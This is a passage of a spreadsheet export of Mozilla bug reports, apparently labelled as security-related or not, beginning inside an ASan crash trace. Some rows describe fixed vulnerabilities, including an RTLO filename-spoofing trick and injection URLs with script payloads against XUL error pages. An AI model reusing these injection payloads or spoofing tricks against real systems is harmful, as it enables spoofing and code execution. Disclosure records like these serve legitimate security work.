    #38 0x7fd8d796dd8c in mozilla::layers::ClientContainerLayer::RenderLayer() gfx/layers/client/ClientContainerLayer.h:65:29
    #39 0x7fd8d794e89e in mozilla::layers::ClientLayerManager::EndTransactionInternal(void (*)(mozilla::layers::PaintedLayer*, gfxContext*, mozilla::gfx::IntRegionTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::IntRegionTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::layers::DrawRegionClip, mozilla::gfx::IntRegionTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, void*), void*, mozilla::layers::LayerManager::EndTransactionFlags) gfx/layers/client/ClientLayerManager.cpp:296:9
    #40 0x7fd8d794ee7c in mozilla::layers::ClientLayerManager::EndTransaction(void (*)(mozilla::layers::PaintedLayer*, gfxContext*, mozilla::gfx::IntRegionTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::IntRegionTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::layers::DrawRegionClip, mozilla::gfx::IntRegionTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, void*), void*, mozilla::layers::LayerManager::EndTransactionFlags) gfx/layers/client/ClientLayerManager.cpp:339:3
    #41 0x7fd8dc74a3db in nsDisplayList::PaintRoot(nsDisplayListBuilder*, nsRenderingContext*, unsigned int) layout/base/nsDisplayList.cpp:1927:17
    #42 0x7fd8dc7fb0d0 in nsLayoutUtils::PaintFrame(nsRenderingContext*, nsIFrame*, nsRegion const&amp;, unsigned int, nsDisplayListBuilderMode, nsLayoutUtils::PaintFrameFlags) layout/base/nsLayoutUtils.cpp:3606:10
    #43 0x7fd8dc8835ad in PresShell::Paint(nsView*, nsRegion const&amp;, unsigned int) layout/base/nsPresShell.cpp:6636:5
    #44 0x7fd8dbe4bf5c in nsViewManager::ProcessPendingUpdatesPaint(nsIWidget*) view/nsViewManager.cpp:484:19
    #45 0x7fd8dbe4ad31 in nsViewManager::ProcessPendingUpdatesForView(nsView*, bool) view/nsViewManager.cpp:415:33
    #46 0x7fd8dbe4ecc9 in nsViewManager::ProcessPendingUpdates() view/nsViewManager.cpp:1119:5
    #47 0x7fd8dc57654f in nsRefreshDriver::Tick(long, mozilla::TimeStamp) layout/base/nsRefreshDriver.cpp:1911:9
    #48 0x7fd8dc58109d in TickDriver layout/base/nsRefreshDriver.cpp:279:13
    #49 0x7fd8dc58109d in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray&lt;RefPtr&lt;nsRefreshDriver&gt; &gt;&amp;) layout/base/nsRefreshDriver.cpp:251
    #50 0x7fd8dc580cf9 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) layout/base/nsRefreshDriver.cpp:270:5
    #51 0x7fd8dc582c94 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(mozilla::TimeStamp) layout/base/nsRefreshDriver.cpp:430:9
    #52 0x7fd8dcf0c2c4 in mozilla::layout::VsyncChild::RecvNotify(mozilla::TimeStamp const&amp;) layout/ipc/VsyncChild.cpp:64:16
    #53 0x7fd8d6823059 in mozilla::layout::PVsyncChild::OnMessageReceived(IPC::Message const&amp;) objdir-ff-asan/ipc/ipdl/PVsyncChild.cpp:240:20
    #54 0x7fd8d62a1814 in mozilla::ipc::PBackgroundChild::OnMessageReceived(IPC::Message const&amp;) objdir-ff-asan/ipc/ipdl/PBackgroundChild.cpp:2133:28
    #55 0x7fd8d61cd566 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&amp;) ipc/glue/MessageChannel.cpp:1661:25
    #56 0x7fd8d61c9c87 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&amp;&amp;) ipc/glue/MessageChannel.cpp:1599:17
    #57 0x7fd8d61b6dff in mozilla::ipc::MessageChannel::OnMaybeDequeueOne() ipc/glue/MessageChannel.cpp:1566:5
    #58 0x7fd8d61e8152 in applyImpl&lt;mozilla::ipc::MessageChannel, bool (mozilla::ipc::MessageChannel::*)()&gt; objdir-ff-asan/dist/include/nsThreadUtils.h:729:12
    #59 0x7fd8d61e8152 in apply&lt;mozilla::ipc::MessageChannel, bool (mozilla::ipc::MessageChannel::*)()&gt; objdir-ff-asan/dist/include/nsThreadUtils.h:735
    #60 0x7fd8d61e8152 in mozilla::detail::RunnableMethodImpl&lt;bool (mozilla::ipc::MessageChannel::*)(), false, true&gt;::Run() objdir-ff-asan/dist/include/nsThreadUtils.h:764
    #61 0x7fd8d61e773f in Run objdir-ff-asan/dist/include/mozilla/ipc/MessageChannel.h:550:29
    #62 0x7fd8d61e773f in mozilla::ipc::MessageChannel::DequeueTask::Run() objdir-ff-asan/dist/include/mozilla/ipc/MessageChannel.h:569
    #63 0x7fd8d53e8802 in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:1068:14
    #64 0x7fd8d54684d8 in NS_ProcessNextEvent(nsIThread*, bool) xpcom/glue/nsThreadUtils.cpp:290:10
    #65 0x7fd8d61d4d51 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:100:21
    #66 0x7fd8d61478f0 in RunInternal ipc/chromium/src/base/message_loop.cc:232:10
    #67 0x7fd8d61478f0 in RunHandler ipc/chromium/src/base/message_loop.cc:225
    #68 0x7fd8d61478f0 in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:205
    #69 0x7fd8dbec0e2f in nsBaseAppShell::Run() widget/nsBaseAppShell.cpp:156:27
    #70 0x7fd8ddfe49c7 in XRE_RunAppShell toolkit/xre/nsEmbedFunctions.cpp:851:22
    #71 0x7fd8d61478f0 in RunInternal ipc/chromium/src/base/message_loop.cc:232:10
    #72 0x7fd8d61478f0 in RunHandler ipc/chromium/src/base/message_loop.cc:225
    #73 0x7fd8d61478f0 in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:205
    #74 0x7fd8ddfe4088 in XRE_InitChildProcess toolkit/xre/nsEmbedFunctions.cpp:681:34
    #75 0x510ae1 in content_process_main ipc/contentproc/plugin-container.cpp:224:19
    #76 0x510ae1 in main browser/app/nsBrowserApp.cpp:357
    #77 0x7fd8ef154f44 in __libc_start_main /build/eglibc-oGUzwX/eglibc-2.19/csu/libc-start.c:287
AddressSanitizer can not describe address in more detail (wild memory access suspected).
SUMMARY: AddressSanitizer: heap-buffer-overflow (/mnt/scratch0/clusterfuzz/slave-bot/builds/linux_asan_firefox/custom/firefox/firefox-bin+0x4bea3b)
Shadow bytes around the buggy address:
  0x0c4680003fe0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4680003ff0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4680004000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4680004010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4680004020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=&gt;0x0c4680004030: fa fa fa fa fa[fa]fa fa fa fa fa fa fa fa fa fa
  0x0c4680004040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4680004050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4680004060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4680004070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c468000408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3447==ABORTING</t>
        </is>
      </c>
      <c r="X5415" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5416">
      <c r="A5416" t="n">
        <v>656422</v>
      </c>
      <c r="B5416" t="inlineStr">
        <is>
          <t>2011-05-11 12:56:11 -0700</t>
        </is>
      </c>
      <c r="C5416" t="inlineStr">
        <is>
          <t>[Rapid Release] New Mozilla Blog futurereleases</t>
        </is>
      </c>
      <c r="D5416" t="inlineStr">
        <is>
          <t>2015-03-12 08:17:16 -0700</t>
        </is>
      </c>
      <c r="E5416" t="n">
        <v>1</v>
      </c>
      <c r="F5416" t="n">
        <v>1</v>
      </c>
      <c r="G5416" t="n">
        <v>6</v>
      </c>
      <c r="H5416" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5416" t="inlineStr">
        <is>
          <t>mozilla.org Graveyard</t>
        </is>
      </c>
      <c r="J5416" t="inlineStr">
        <is>
          <t>Server Operations</t>
        </is>
      </c>
      <c r="K5416" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L5416" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5416" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5416" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5416" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5416" t="inlineStr"/>
      <c r="Q5416" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5416" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5416" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5416" t="n">
        <v>1</v>
      </c>
      <c r="U5416" t="n">
        <v>0</v>
      </c>
      <c r="V5416" t="n">
        <v>16</v>
      </c>
      <c r="W5416" t="inlineStr">
        <is>
          <t>hi, 
need help in getting the code deployed to production and "network activate" the theme so it will be available to use on network blogs. In addition, we also need it to link to  blog.mozilla.com/futurereleases.
here are some details below: 
Name of the Blog: Future Releases Blog 
Link to Blog: blog.mozilla.com/futurereleases
Access to Blog: 
Grace Jimenez - grace@mozilla.com
Laura Mesa - lmesa@mozilla.com
Caitlin Looney - clooney@mozilla.com
Mayumi Matsuno - mmatsuno@mozilla.com
Erica Jostedt - ejostedt@mozilla.com
The theme is in Subversion in http://viewvc.svn.mozilla.org/vc?revision=88375&amp;view=revision
Please let me know if you need any additional info. The blog page needs to be live on the 17th. But webdev needs the blog to be live before that in order to link to from the new firefox/channel page. (http://people.mozilla.com/~gjimenez/redesignfirefoxchannelpage.psd)</t>
        </is>
      </c>
      <c r="X5416" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5417">
      <c r="A5417" t="n">
        <v>1745566</v>
      </c>
      <c r="B5417" t="inlineStr">
        <is>
          <t>2021-12-11 00:27:36 -0800</t>
        </is>
      </c>
      <c r="C5417" t="inlineStr">
        <is>
          <t>"frame-ancestors" CSP directive not enforced for framed extension pages</t>
        </is>
      </c>
      <c r="D5417" t="inlineStr">
        <is>
          <t>2024-05-30 10:52:06 -0700</t>
        </is>
      </c>
      <c r="E5417" t="n">
        <v>1</v>
      </c>
      <c r="F5417" t="n">
        <v>1</v>
      </c>
      <c r="G5417" t="n">
        <v>3</v>
      </c>
      <c r="H5417" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5417" t="inlineStr">
        <is>
          <t>WebExtensions</t>
        </is>
      </c>
      <c r="J5417" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5417" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5417" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5417" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5417" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5417" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5417" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main97+][adv-esr91.6+]</t>
        </is>
      </c>
      <c r="Q5417" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5417" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S5417" t="inlineStr">
        <is>
          <t>97 Branch</t>
        </is>
      </c>
      <c r="T5417" t="n">
        <v>1</v>
      </c>
      <c r="U5417" t="n">
        <v>0</v>
      </c>
      <c r="V5417" t="n">
        <v>14</v>
      </c>
      <c r="W5417" t="inlineStr">
        <is>
          <t>Mart from Flowcrypt wrote the security alias to let us know that their WebExtension uses a CSP with a frame-ancestors directive, and that Firefox does not enforce it when web content frames one of their web-accessible extension pages. In contrast, Chrome does. This exposes their content to the risk of clickjacking.
Their CSP is:
`upgrade-insecure-requests; script-src 'self'; frame-ancestors https://mail.google.com 'self'; img-src 'self' https://*.googleusercontent.com data: blob:; frame-src 'self' blob:; worker-src 'self'; form-action 'none'; media-src 'none'; font-src 'none'; manifest-src 'none'; object-src 'none'; base-uri 'self'`
https://github.com/FlowCrypt/flowcrypt-browser/blob/master/extension/manifest.json#L93
It appears we intentionally limit frame-ancestor checks to HTTP channels,
https://searchfox.org/mozilla-central/rev/9b600caf7e9133876e44af4cd4558ed4f02870cf/dom/security/nsContentSecurityUtils.cpp#896-897,905-907
but it seems quite a useful thing to do for web extensions also</t>
        </is>
      </c>
      <c r="X5417" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5418">
      <c r="A5418" t="n">
        <v>1649160</v>
      </c>
      <c r="B5418" t="inlineStr">
        <is>
          <t>2020-06-29 07:58:29 -0700</t>
        </is>
      </c>
      <c r="C5418" t="inlineStr">
        <is>
          <t>Download Feature: unicode RTLO char can fake the file extension</t>
        </is>
      </c>
      <c r="D5418" t="inlineStr">
        <is>
          <t>2024-05-30 10:16:14 -0700</t>
        </is>
      </c>
      <c r="E5418" t="n">
        <v>1</v>
      </c>
      <c r="F5418" t="n">
        <v>1</v>
      </c>
      <c r="G5418" t="n">
        <v>2</v>
      </c>
      <c r="H5418" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5418" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J5418" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5418" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5418" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5418" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5418" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5418" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5418" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?]</t>
        </is>
      </c>
      <c r="Q5418" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5418" t="inlineStr">
        <is>
          <t>S4</t>
        </is>
      </c>
      <c r="S5418" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5418" t="n">
        <v>1</v>
      </c>
      <c r="U5418" t="n">
        <v>0</v>
      </c>
      <c r="V5418" t="n">
        <v>33</v>
      </c>
      <c r="W5418" t="inlineStr">
        <is>
          <t>Created attachment 9160077
regedt‮gpj.exe
Summary:  
    I have found a vulnerability of  RTLO in  RTLO in  firefox browser’s download feature 
Step to Reproduce:
    1. Change the filename to: malicious&lt;RTLO_Char&gt;&lt;fake_ext&gt;.&lt;real_ext&gt;
        For example: regedt&lt;RTLO&gt;jpg.exe
    2. When the browser download feature fails to to parse the character perfectly, the filename will be changed to regedtexe.jpg
Impact:
    There isn't a good way to utilize to cause a damage in ios, but the vulnerability is there for unkonwn Subsequent attack
system detail:
    firefox 27.0(18428)
    OS iphone 13.5.1
The Reference:
    1. opera Mini for Android(CVE-2019–18624): http://www.firstsight.me/2019/10/illegal-rendered-at-download-feature-in-several-apps-including-opera-mini-that-lead-to-extension-manipulation-with-rtlo/
    2. Zero-day vulnerability in Telegram:https://securelist.com/zero-day-vulnerability-in-telegram/83800/
    3. hackerone RTL override symbol not stripped from file names https://hackerone.com/reports/298
    4. the rtlo info : https://blog.malwarebytes.com/cybercrime/2014/01/the-rtlo-method/</t>
        </is>
      </c>
      <c r="X5418" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5419">
      <c r="A5419" t="n">
        <v>1408349</v>
      </c>
      <c r="B5419" t="inlineStr">
        <is>
          <t>2017-10-13 03:14:54 -0700</t>
        </is>
      </c>
      <c r="C5419" t="inlineStr">
        <is>
          <t>Possible unsanitized write to innerHTML for Activity Stream's snippets</t>
        </is>
      </c>
      <c r="D5419" t="inlineStr">
        <is>
          <t>2020-06-05 00:04:25 -0700</t>
        </is>
      </c>
      <c r="E5419" t="n">
        <v>1</v>
      </c>
      <c r="F5419" t="n">
        <v>1</v>
      </c>
      <c r="G5419" t="n">
        <v>2</v>
      </c>
      <c r="H5419" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5419" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5419" t="inlineStr">
        <is>
          <t>New Tab Page</t>
        </is>
      </c>
      <c r="K5419" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5419" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5419" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5419" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5419" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5419" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main68+]</t>
        </is>
      </c>
      <c r="Q5419" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R5419" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5419" t="inlineStr">
        <is>
          <t>Firefox 68</t>
        </is>
      </c>
      <c r="T5419" t="n">
        <v>1</v>
      </c>
      <c r="U5419" t="n">
        <v>0</v>
      </c>
      <c r="V5419" t="n">
        <v>18</v>
      </c>
      <c r="W5419" t="inlineStr">
        <is>
          <t>I was looking at upgrading Activity Stream to the latest eslint-plugin-mozilla, which also starts enabling rules from eslint-plugin-no-unsanitized.
It raised an error here:
https://github.com/mozilla/activity-stream/blob/019fdbda6f3a07a4f8cb2beccba8e5ff14926cc8/system-addon/content-src/lib/snippets.js#L253
    // Note that injecting snippets can throw if they're invalid XML.
    snippetsEl.innerHTML = payload;
activity-stream/system-addon/content-src/lib/snippets.js (1/0)
  ✖  253:5  Unsafe assignment to innerHTML  no-unsanitized/property
I couldn't see any code that was sanitizing the payload, but it seems an intentional assignment to innerHTML.
I don't know where the payload is coming from, hence raising the issue to get it documented.</t>
        </is>
      </c>
      <c r="X5419" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5420">
      <c r="A5420" t="n">
        <v>1448165</v>
      </c>
      <c r="B5420" t="inlineStr">
        <is>
          <t>2018-03-22 14:41:59 -0700</t>
        </is>
      </c>
      <c r="C5420" t="inlineStr">
        <is>
          <t>Move deviceId and deviceRegistrationVersion under a device key in signedInUser.json</t>
        </is>
      </c>
      <c r="D5420" t="inlineStr">
        <is>
          <t>2018-03-29 13:16:35 -0700</t>
        </is>
      </c>
      <c r="E5420" t="n">
        <v>1</v>
      </c>
      <c r="F5420" t="n">
        <v>1</v>
      </c>
      <c r="G5420" t="n">
        <v>2</v>
      </c>
      <c r="H5420" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5420" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5420" t="inlineStr">
        <is>
          <t>Sync</t>
        </is>
      </c>
      <c r="K5420" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5420" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5420" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5420" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5420" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5420" t="inlineStr"/>
      <c r="Q5420" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5420" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5420" t="inlineStr">
        <is>
          <t>Firefox 61</t>
        </is>
      </c>
      <c r="T5420" t="n">
        <v>1</v>
      </c>
      <c r="U5420" t="n">
        <v>0</v>
      </c>
      <c r="V5420" t="n">
        <v>29</v>
      </c>
      <c r="W5420" t="inlineStr">
        <is>
          <t>This is spun of bug 1447479 where we need to associate a device with message indexes.</t>
        </is>
      </c>
      <c r="X5420" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5421">
      <c r="A5421" t="n">
        <v>385454</v>
      </c>
      <c r="B5421" t="inlineStr">
        <is>
          <t>2007-06-22 05:02:34 -0700</t>
        </is>
      </c>
      <c r="C5421" t="inlineStr">
        <is>
          <t>move Linux xulrunner trunk builds off of argo to newer machine</t>
        </is>
      </c>
      <c r="D5421" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E5421" t="n">
        <v>1</v>
      </c>
      <c r="F5421" t="n">
        <v>1</v>
      </c>
      <c r="G5421" t="n">
        <v>5</v>
      </c>
      <c r="H5421" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5421" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J5421" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5421" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L5421" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5421" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5421" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5421" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5421" t="inlineStr"/>
      <c r="Q5421" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5421" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5421" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5421" t="n">
        <v>1</v>
      </c>
      <c r="U5421" t="n">
        <v>0</v>
      </c>
      <c r="V5421" t="n">
        <v>6</v>
      </c>
      <c r="W5421" t="inlineStr">
        <is>
          <t>Linux xulrunner trunk is currently being built by argo, and is currently burning because it doesn't compile the Breakpad code properly.  It would be nice to get those builds on a machine from this century.</t>
        </is>
      </c>
      <c r="X5421" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5422">
      <c r="A5422" t="n">
        <v>441169</v>
      </c>
      <c r="B5422" t="inlineStr">
        <is>
          <t>2008-06-22 11:21:08 -0700</t>
        </is>
      </c>
      <c r="C5422" t="inlineStr">
        <is>
          <t>HTML injection into XUL error pages through badcert parameters</t>
        </is>
      </c>
      <c r="D5422" t="inlineStr">
        <is>
          <t>2017-05-17 06:13:19 -0700</t>
        </is>
      </c>
      <c r="E5422" t="n">
        <v>1</v>
      </c>
      <c r="F5422" t="n">
        <v>1</v>
      </c>
      <c r="G5422" t="n">
        <v>6</v>
      </c>
      <c r="H5422" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5422" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J5422" t="inlineStr">
        <is>
          <t>Security: UI</t>
        </is>
      </c>
      <c r="K5422" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5422" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5422" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5422" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5422" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5422" t="inlineStr">
        <is>
          <t>[sg:critical] critical combined with a chrome-loading bug like 441120</t>
        </is>
      </c>
      <c r="Q5422" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5422" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5422" t="inlineStr">
        <is>
          <t>mozilla1.9</t>
        </is>
      </c>
      <c r="T5422" t="n">
        <v>1</v>
      </c>
      <c r="U5422" t="n">
        <v>0</v>
      </c>
      <c r="V5422" t="n">
        <v>20</v>
      </c>
      <c r="W5422" t="inlineStr">
        <is>
          <t>Ben Turner found that the changes to XUL error pages to handle SSL errors works by passing display text as a parameter and that this text is not sanitized against HTML injection. In fact, the intended behavior of those dialogs _relies_ on it. This is now trivial to inject arbitrary code into.
chrome://global/content/netError.xhtml?e=nssBadCert&amp;u=https%3A//test.kuix.de/&amp;c=UTF-8&amp;d=%3Cspan%20onmouseover%3d%22try{alert(Components.stack)}catch(e){alert(e)}%22%3Etest.kuix.de%20uses%20an%20%3Cb%3Einvalid%3C/b%3E%20security%20certificate.%0A%0AThe%20certificate%20is%20only%20valid%20for%20%3Cscript%3Ealert(123)%3C/script%3E%3Ca%20id%3D%22cert_domain_link%22%20title%3D%22kuix.de%22%20href%3D%22http://www.mozilla.com%22%3Ekuix.de%3C/a%3E%0A%0A(Error%20code%3A%20ssl_error_bad_cert_domain)%0A%3C/span%3E
about:neterror?e=nssBadCert&amp;u=https%3A//test.kuix.de/&amp;c=UTF-8&amp;d=&lt;span%20onmouseover%3d"try{alert(Components.stack)}catch(e){alert(e)}"&gt;test.kuix.de%20uses%20an%20&lt;b&gt;invalid&lt;/b&gt;%20security%20certificate.%0A%0AThe%20certificate%20is%20only%20valid%20for%20&lt;script&gt;alert(123)&lt;/script&gt;&lt;a%20id%3D"cert_domain_link"%20title%3D"kuix.de"%20href%3D"http://www.mozilla.com"&gt;kuix.de&lt;/a&gt;%0A%0A(Error%20code%3A%20ssl_error_bad_cert_domain)%0A&lt;/span&gt;
when called via about:neterror any injected script only has normal privileges, it's primarily a spoofing vector.
When called as a chrome: uri this allows arbitrary code execution. Normally remote content can't load user code can't load chrome: URIs directly, but a potential danger when combined with other flaws.
There is currently such a flaw: this can be combined with bug 441120 to create an arbitrary code execution exploit.</t>
        </is>
      </c>
      <c r="X5422" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5423">
      <c r="A5423" t="n">
        <v>601610</v>
      </c>
      <c r="B5423" t="inlineStr">
        <is>
          <t>2010-10-04 07:41:19 -0700</t>
        </is>
      </c>
      <c r="C5423" t="inlineStr">
        <is>
          <t>talos-r3-snow-016 started misbehaving during downtime</t>
        </is>
      </c>
      <c r="D5423" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E5423" t="n">
        <v>1</v>
      </c>
      <c r="F5423" t="n">
        <v>1</v>
      </c>
      <c r="G5423" t="n">
        <v>5</v>
      </c>
      <c r="H5423" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5423" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J5423" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5423" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L5423" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5423" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5423" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5423" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5423" t="inlineStr"/>
      <c r="Q5423" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5423" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5423" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5423" t="n">
        <v>1</v>
      </c>
      <c r="U5423" t="n">
        <v>0</v>
      </c>
      <c r="V5423" t="n">
        <v>3</v>
      </c>
      <c r="W5423" t="inlineStr">
        <is>
          <t>After we had restarted talos-master02 we got a lot of jobs being wasted by this slave.
I have neither beng able to ssh nor VNC to the machine. I have requested a graceful shutdown and will have to re-trigger all failed jobs.
Before the downtime it had messed up 4 jobs already.
* Oct 03 05:51 	?? 	exception (after restart)
* Oct 02 21:54 	?? 	exception
* Oct 02 21:54 	?? 	exception
* Oct 02 20:41 	?? 	exception
* Oct 02 20:41 	?? 	exception
* Oct 02 15:18 	?? 	warnings (last known good)
http://talos-master02.build.mozilla.org:8012/buildslaves/talos-r3-snow-016?numbuilds=140</t>
        </is>
      </c>
      <c r="X5423" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5424">
      <c r="A5424" t="n">
        <v>761667</v>
      </c>
      <c r="B5424" t="inlineStr">
        <is>
          <t>2012-06-05 09:34:45 -0700</t>
        </is>
      </c>
      <c r="C5424" t="inlineStr">
        <is>
          <t>Firefox ignores the X-Frame-Options header when using server push</t>
        </is>
      </c>
      <c r="D5424" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E5424" t="n">
        <v>1</v>
      </c>
      <c r="F5424" t="n">
        <v>1</v>
      </c>
      <c r="G5424" t="n">
        <v>3</v>
      </c>
      <c r="H5424" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5424" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5424" t="inlineStr">
        <is>
